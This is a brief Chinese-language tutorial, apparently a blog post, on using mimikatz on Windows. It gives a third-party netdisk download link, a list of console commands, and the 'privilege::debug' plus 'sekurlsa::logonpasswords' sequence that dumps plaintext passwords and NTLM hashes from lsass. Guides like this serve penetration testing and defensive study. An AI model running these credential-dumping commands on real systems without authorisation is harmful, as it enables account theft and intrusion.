工具使用——神器mimikatz使用

0X00工具简介：

mimikatz是一款windows平台下的神器，它具备很多功能，其中最亮的功能是直接从lsass.exe进程里获取windows处于active状态账号以及明文密码。mimikatz的功能不仅如此，它还可以提升进程权限，注入进程，读取进程内存等。

0X01工具下载：

下载地址：（链接：https://pan.baidu.com/s/189BtUTGEGLyUfcas5pMhHg 提取码：zwj9）

下载解压后双击.exe即可运行。

0X02基础命令：

cls                                              清屏
exit                                             退出
version                                          查看版本
help                                             查看帮助
system::user                                     查看当前登录的系统用户
system::computer                                 查看计算机名称
process::list                                    列出进程
privilege::debug                                 提升权限
sekurlsa::logonpasswords                         获取登录用户信息以及明文密码

0X03使用效果：

首先提权

privilege::debug

 

 获取本机用户名、密码、sid、LM hash、NTML hash等。

sekurlsa::logonpasswords